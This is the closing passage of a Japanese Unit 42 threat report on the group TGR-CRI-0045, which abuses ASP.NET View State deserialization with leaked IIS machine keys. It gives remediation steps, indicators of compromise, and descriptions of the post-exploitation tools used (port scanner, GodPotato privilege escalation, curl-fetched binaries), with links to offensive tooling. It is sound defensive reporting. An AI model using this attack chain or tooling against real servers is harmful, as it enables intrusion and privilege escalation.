* [T1505.003](https://attack.mitre.org/techniques/T1505/003/) - Webシェル(web.configの潜在的な変更)
* [T1572](https://attack.mitre.org/techniques/T1572/) - プロトコル トンネリング(使用される場合、未回復ファイル ダウンロード モジュールにインポートされた関数に基づく）
* [T1587.001](https://attack.mitre.org/techniques/T1587/001/) - マルウェア

### 修復とハード化のガイダンス

#### マシン キー

IISマシン キーは、クライアント サーバー データの認証と暗号化に使用される基本的な暗号コンポーネントです。これらは、View Stateのデシリアライズを悪用するうえで不可欠とされます。

View Stateのデシリアライズの悪用が疑われる場合、IISアプリケーションに関して以下の項目をチェックしてください。

* View Stateメッセージ認証コード(MAC)が有効になっていないこと
  * これは、web.configとmachine.configで[\<pages enableViewStateMac="False" /\>](https://devblogs.microsoft.com/dotnet/farewell-enableviewstatemac/)を検索することで実行可能です。
* 漏洩したマシン キーの使用
* マシン キーが盗まれていないか

4つのケースを想定したガイドを以下の通り示します。

* View State MAC署名が無効になっている場合は、アプリケーションの安定性をテストした後に有効にしてください。
* View State MAC署名が有効で、静的なマシン鍵を使用している場合、鍵が漏洩していると考えてください。[Microsoft](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)または[Zeroed.Tech](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)のガイダンスに従って修復してください。
* f View State MAC署名が有効で、[Blacklist3r](https://github.com/NotSoSecure/Blacklist3r/blob/master/MachineKey/AspDotNetWrapper/AspDotNetWrapper/Resource/MachineKeys.txt)などの既知の危険なリストにある静的マシン キーを使用している場合: 上記のMicrosoftのガイダンスに従ってキーをリセットし、新しいキーがこの拒否リストにないことを確認する。
* View State MAC署名が有効で、動的なマシン キーを使用している場合は、鍵が危殆化したとみなし、IIS Server Managerで鍵を再生成します。

[Microsoftの修正に関するガイダンス](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)を参照することを強くお勧めします。

## 結論

調査により、TGR-CRI-0045が永続的アクセスのためにインメモリIIS技術をどのように活用しているかが明らかになりました。公開されたマシン キーを介してASP.NETのView Stateのデシリアライゼーションの脆弱性を悪用することで、攻撃者はディスク上の痕跡を最小限に抑え、長期的なアクセスを可能にしています。

Microsoftが概説したように、このグループの場当たり的な標的設定と継続的なツール開発は、組織が侵害されたマシン キーの特定と修復を優先する必要性を浮き彫りにするものです。エクスプロイトが単発であることの性質と従来の遠隔計測の限界は、条件付きPOSTリクエスト ロギングと注意深いASP.NETイベントログ解析の必要性を示しています。これらの対策は、エンドポイント ソリューションがこのような攻撃を可視化できない場合に、検出と対応を支援するものです。

### パロアルトネットワークスの保護と緩和策

パロアルトネットワークスのお客様は、以下の製品を通じて、上記の脅威に対する確実な保護を構築いただけます。

* [Advanced WildFire](https://docs.paloaltonetworks.com/wildfire) の機械学習モデルと分析技術は、本研究で共有されたインジケーターに照らして見直され、更新されています。
* [Advanced URL Filtering](https://docs.paloaltonetworks.com/advanced-url-filtering/administration) そして [Advanced DNS Security](https://docs.paloaltonetworks.com/dns-security)この活動に関連する既知のドメインやURLを悪意のあるものとして特定する。

#### XDRとXSIAMのIIS保護

[Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR)および[XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) IIS保護モジュールは、このブログで説明したように、View Stateのデシリアライズを検出および防止する機能を備えています。このモジュールはデフォルトで有効になっています。

情報漏えいの可能性がある場合、または緊急の案件がある場合は、[Unit 42インシデント レスポンス チーム](https://start.paloaltonetworks.com/contact-unit42.html) までご連絡ください。

* 北米: フリーダイヤル: +1 (866) 486-4842 (866.4.UNIT42)
* 英国: +44.20.3743.3660
* ヨーロッパおよび中東: +31.20.299.3130
* アジア: +65.6983.8730
* 日本: +81.50.1790.0200
* オーストラリア: +61.2.4062.7950
* インド: 00080005045107

パロアルトネットワークスは、本調査結果をサイバー脅威アライアンス (CTA) のメンバーと共有しています。CTAの会員は、この情報を利用して顧客に対して迅速に保護を提供し、悪意のあるサイバー アクターを組織的に妨害します。[サイバー脅威アライアンス](https://www.cyberthreatalliance.org)について詳細を見る。

## 侵害のインジケーター

**リフレクティブ.NET アセンブリ ハッシュ:**

* 106506ebc7156be116fe5d2a4d662917ddbbfb286007b6ee7a2b01c9536b1ee4
* 87bd7e24af5f10fe1e01cfa640ce26e9160b0e0e13488d7ee655e83118d16697
* 55656f7b2817087183ceedeb4d9b78d3abee02409666bffbe180d6ea87ee20fb
* 18a90b3702776b23f87738b26002e013301f60d9801d83985a57664b133cadd1
* d5d0772cb90d54ac3e3093c1ea9fcd7b878663f7ddd1f96efea0725ce47d46d5
* b3c085672ac34f1b738879096af5fcd748953116e319367e6e371034366eaeca
* ファイルサイズ: 様々
* ファイルの種類: 実行可能ファイル(DLL)
* ファイルの説明: 観測されたコンパイル済みアセンブリのハッシュ
* メソッドを実行する: デシリアライズ時にIISによってロード

**ディスクに残されたエクスプロイト後のツール:**

* d4bfaf3fd3d3b670f585114b4619aaf9b10173c5b1e92d42be0611b6a9b1eff2
* c1f66cadc1941b566e2edad0d1f288c93bf060eef383c79638306638b6cefdf8
* ファイルの種類: 実行可能ファイル
* ファイルの説明:txpm.exeまたはtxp.exeという名前の[TxPortMap](https://github.com/4dogs-cn/TXPortMap)
* 実行方法: cmd /c
* 52a72f899991506d2b1df958dd8736f7baa26592d664b771c3c3dbaef8d3114a
* d3767be11d9b211e74645bf434c9a5974b421cb96ec40d856f4b232a5ef9e56d
* ファイルの種類: 実行可能ファイル
* ファイルの説明: updf.exeまたはupという名前の.NET実行ファイルは、GodPotato特権昇格テクニックを使用して、昇格し、新しいローカル管理者を作成するか、cmd /cのインスタンスを実行します。
* 実行方法: cmd /c
* f368ec59fb970cc23f955f127016594e2c72de168c776ae8a3f9c21681860e9c
* ファイルの種類: ELF
* ファイルの説明: Linuxホスト上でユーザがrootユーザとしてコマンドやバイナリを実行できるようにする。curl経由でダウンロード。

**悪用IPアドレス:**

* 67\.43.234\[.\]96
* 213\.252.232\[.\]237
* 98\.159.108\[.\]69
* 190\.211.254\[.\]95
* 109\.176.229\[.\]89
* 169\.150.198\[.\]91
* 194\.5.82\[.\]11
* 138\.199.21\[.\]243
* 194\.114.136\[.\]95

2024年10月から2025年2月にかけて、悪意のある\_\_VIEWSTATEパラメータを含む悪用ペイロードが以下のIPアドレスから観測されました。IISサーバーをターゲットとするこれらのアドレスからのHTTP/sトラフィックを調べる必要があります。

**インフラストラクチャーのステージング、ポストエクスプロイト ツール:**

* 195\.123.240\[.\]233

2025年1月から2月にかけて、脅威アクターはWindows上のcurlを介してこのアドレスからツールを引き出しています。

## その他の資料

* [公開されたASP.NETマシン キーを使用したコード インジェクション攻撃](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)-- Microsoft Security Blog
* [View Stateのメッセージ認証コード(MAC)エラーの解決](https://support.microsoft.com/en-us/topic/resolving-view-state-message-authentication-code-mac-errors-6c0e9fd3-f8a8-c953-8fbe-ce840446a9f3#ID0EDH) --Microsoftサポート
* [ASP.NETのビューView Stateの解説](<https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/ms972976(v=msdn.10)?redirectedfrom=MSDN>) - Microsoft
* [View State: 積極的に悪用されているパッチを当てられないIISの永遠の一日](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited)
* [XamlAssemblyLoadFromFileGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs) -- GitHub
* [ViewStatePlugin.cs](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs) -- GitHub
* [GitHub - MachineKeys.txt](https://github.com/NotSoSecure/Blacklist3r/blob/master/MachineKey/AspDotNetWrapper/AspDotNetWrapper/Resource/MachineKeys.txt)
* [mstic/RapidReleaseTI/MachineKeys.csv at master](https://github.com/microsoft/mstic/blob/master/RapidReleaseTI/MachineKeys.csv)
* [GitHub - BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
* [GitHub - 4dogs-cn/TXPortMap:TianXiangからポート スキャナ＆バナー識別](https://github.com/4dogs-cn/TXPortMap)
* [GOLD MELODY:イニシャル アクセス ブローカーのプロファイル｜Secureworks](https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker)
* [マンディアントのマルチバースにおけるUNC961:金銭的動機に基づく脅威アクターとの3つの遭遇](https://cloud.google.com/blog/topics/threat-intelligence/unc961-multiverse-financially-motivated)
* [MACが有効になっていないASP.NET ViewState - PortSwigger](https://portswigger.net/kb/issues/00400600_asp-net-viewstate-without-mac-enabled)
* [Falcon OverWatchが新しいIceAppleフレームワークを検出｜CrowdStrike](https://www.crowdstrike.com/en-us/blog/falcon-overwatch-detects-iceapple-framework/)

トップに戻る

### タグ

* [GoLang](https://unit42.paloaltonetworks.com/ja/tag/golang-ja/ "GoLang")
* [Initial Access](https://unit42.paloaltonetworks.com/ja/tag/initial-access/ "Initial Access")
* [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/ "Microsoft")
* [Web server](https://unit42.paloaltonetworks.com/ja/tag/web-server-ja/ "web server")
* [Web shells](https://unit42.paloaltonetworks.com/ja/tag/web-shells-ja/ "web shells")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:Apacheを徹底検証: Tomcat Partial PUとCamelによるヘッダー ハイジャック](https://unit42.paloaltonetworks.com/ja/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/ "Apacheを徹底検証: Tomcat Partial PUとCamelによるヘッダー ハイジャック")

### 目次

* 

### 関連記事

* [React Server Components における重大な脆弱性の悪用 (12月12日更新)](https://unit42.paloaltonetworks.com/ja/cve-2025-55182-react-and-cve-2025-66478-next/ "article - table of contents")
* [Microsoft WSUSのリモートコード実行の脆弱性（CVE-2025-59287）、実環境における活発な悪用を確認（11月3日更新）](https://unit42.paloaltonetworks.com/ja/microsoft-cve-2025-59287/ "article - table of contents")
* [Jingle Thief: クラウドベースのギフトカード詐欺キャンペーンの実態](https://unit42.paloaltonetworks.com/ja/cloud-based-gift-card-fraud-campaign/ "article - table of contents")

## 関連項目 サイバー犯罪 リソース

![Pictorial representation of Muddled Libra, aka Scattered Spider. A vibrant illustration of the Libra zodiac sign, featuring a stylized balance scale overlaid with a prominent Libra symbol. The background is a starry night sky with shades of purple and blue, suggesting a cosmic theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/03-1-Muddle-Libra-1920x900-1-786x368.png)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年2月10日 [#### Muddled Libraのプレイブックを覗いてみよう](https://unit42.paloaltonetworks.com/ja/muddled-libra-ops-playbook/)

* [Muddled Libra](https://unit42.paloaltonetworks.com/ja/tag/muddled-libra-ja/ "Muddled Libra")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")

* [Scattered Spider](https://unit42.paloaltonetworks.com/ja/tag/scattered-spider-ja/ "Scattered Spider")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/muddled-libra-ops-playbook/ "Muddled Libraのプレイブックを覗いてみよう")  
  ![Pictorial representation of threat groups from Russia. The silhouette of a bear and the Ursa constellation inside an orange abstract planet. Abstract, stylized cosmic setting with vibrant blue and purple shapes, representing space and distant planetary bodies.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/Ursa-Russia-B-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/ja/category/insights-ja/) 2026年1月29日 [#### 2026年冬季オリンピックに対するロシアのサイバー脅威を理解する](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/)

* [AI](https://unit42.paloaltonetworks.com/ja/tag/ai-ja/ "AI")

* [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/ "IoT")

* [Russia](https://unit42.paloaltonetworks.com/ja/tag/russia-ja/ "Russia")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/russian-cyberthreat-2026-winter-olympics/ "2026年冬季オリンピックに対するロシアのサイバー脅威を理解する")  
  ![Pictorial representation of 01flip ransomware written in Rust. Digital artwork of a pixelated U.S. dollar bill disintegrating into small blocks against a blue data matrix background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/05_Ransomware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年12月10日 [#### 01flip:Rustで書かれたマルチプラットフォーム ランサムウェア](https://unit42.paloaltonetworks.com/ja/new-ransomware-01flip-written-in-rust/)

* [Bitcoin](https://unit42.paloaltonetworks.com/ja/tag/bitcoin-ja/ "Bitcoin")

* [CL-CRI-103](https://unit42.paloaltonetworks.com/ja/tag/cl-cri-103-ja/ "CL-CRI-103")

* [Cryptocurrency](https://unit42.paloaltonetworks.com/ja/tag/cryptocurrency-ja/ "Cryptocurrency")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/new-ransomware-01flip-written-in-rust/ "01flip:Rustで書かれたマルチプラットフォーム ランサムウェア")  
  ![Pictorial representation of malicious LLMs. Close-up view of a digital wall displaying various glowing icons, representing a high-tech network interface.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/AdobeStock_1270203474-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年11月25日 [#### AIのデュアルユースのジレンマ：悪意あるLLM](https://unit42.paloaltonetworks.com/ja/dilemma-of-ai-malicious-llm/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [Data exfiltration](https://unit42.paloaltonetworks.com/ja/tag/data-exfiltration-ja/ "data exfiltration")

* [LLM](https://unit42.paloaltonetworks.com/ja/tag/llm-ja/ "LLM")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/dilemma-of-ai-malicious-llm/ "AIのデュアルユースのジレンマ：悪意あるLLM")  
  ![Pictorial representation of Gh0st RAT malware. A woman analyzes code on a computer screen in an office setting, with another individual working in the background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/04_Security-Technology_Category_1505x922-718x440.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年11月14日 [#### デジタル ドッペルゲンガーGh0st RATを配信する進化するなりすましキャンペーンの分析](https://unit42.paloaltonetworks.com/ja/impersonation-campaigns-deliver-gh0st-rat/)

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")

* [Gh0st Rat](https://unit42.paloaltonetworks.com/ja/tag/gh0st-rat-ja/ "Gh0st Rat")

* [PDNS](https://unit42.paloaltonetworks.com/ja/tag/pdns-ja/ "PDNS")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/impersonation-campaigns-deliver-gh0st-rat/ "デジタル ドッペルゲンガーGh0st RATを配信する進化するなりすましキャンペーンの分析")  
  ![Pictorial representation of a gift card fraud campaign. A glowing skull and crossbones on a circuit board.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/10/07_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2025年10月22日 [#### Jingle Thief: クラウドベースのギフトカード詐欺キャンペーンの実態](https://unit42.paloaltonetworks.com/ja/cloud-based-gift-card-fraud-campaign/)

* [CL‑CRI‑1032](https://unit42.paloaltonetworks.com/ja/tag/cl-cri-1032-ja/ "CL‑CRI‑1032")

* [Microsoft](https://unit42.paloaltonetworks.com/ja/tag/microsoft-ja/ "Microsoft")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cloud-based-gift-card-fraud-campaign/ "Jingle Thief: クラウドベースのギフトカード詐欺キャンペーンの実態")  
  ![Pictorial representation of Unit 42 threat attribution system. Illustration featuring a white triangle centered within an abstract cosmic background of purple and blue swirls and stars.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/Generic-A-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2025年7月31日 [#### Unit 42のアトリビューション フレームワークの紹介](https://unit42.paloaltonetworks.com/ja/unit-42-attribution-framework/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [Bookworm](https://unit42.paloaltonetworks.com/ja/tag/bookworm-ja/ "Bookworm")

* [Nomenclature](https://unit42.paloaltonetworks.com/ja/tag/nomenclature-ja/ "nomenclature")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/unit-42-attribution-framework/ "Unit 42のアトリビューション フレームワークの紹介")  
  ![Pictorial representation of social engineering. Digital illustration of four human profiles connected by glowing neural network lines against a dark background, symbolizing connectivity and technology.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/cover-1920x900-no-blades-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-report-white-1.svg)トレンド レポート](https://unit42.paloaltonetworks.com/ja/category/trend-reports-ja/) 2025年7月30日 [#### Unit 42インシデント レスポンス レポート(2025年版): ソーシャル エンジニアリング編](https://unit42.paloaltonetworks.com/ja/2025-unit-42-global-incident-response-report-social-engineering-edition/)

* [Agent Serpens](https://unit42.paloaltonetworks.com/ja/tag/agent-serpens-ja/ "Agent Serpens")

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [Lumma Stealer](https://unit42.paloaltonetworks.com/ja/tag/lumma-stealer-ja/ "Lumma Stealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/2025-unit-42-global-incident-response-report-social-engineering-edition/ "Unit 42インシデント レスポンス レポート(2025年版): ソーシャル エンジニアリング編")  
  ![Pictorial representation of Iranian-backed threat groups and hacktivists. Digital illustration of a global network featuring interconnected lines and dots, suggesting a data-driven representation of worldwide connectivity, with a focus on technology and innovation. The image uses blue tones with red and light blue highlights.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/06/08_Nation-State-cyberattacks_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2025年6月30日 [#### 脅威情報: イランに関連するサイバー リスクの拡大 (6月30日更新）](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2025/)

* [Agent Serpens](https://unit42.paloaltonetworks.com/ja/tag/agent-serpens-ja/ "Agent Serpens")

* [Agonizing Serpens](https://unit42.paloaltonetworks.com/ja/tag/agonizing-serpens-ja/ "Agonizing Serpens")

* [Boggy Serpens](https://unit42.paloaltonetworks.com/ja/tag/boggy-serpens-ja/ "Boggy Serpens")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2025/ "脅威情報: イランに関連するサイバー リスクの拡大 (6月30日更新）")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
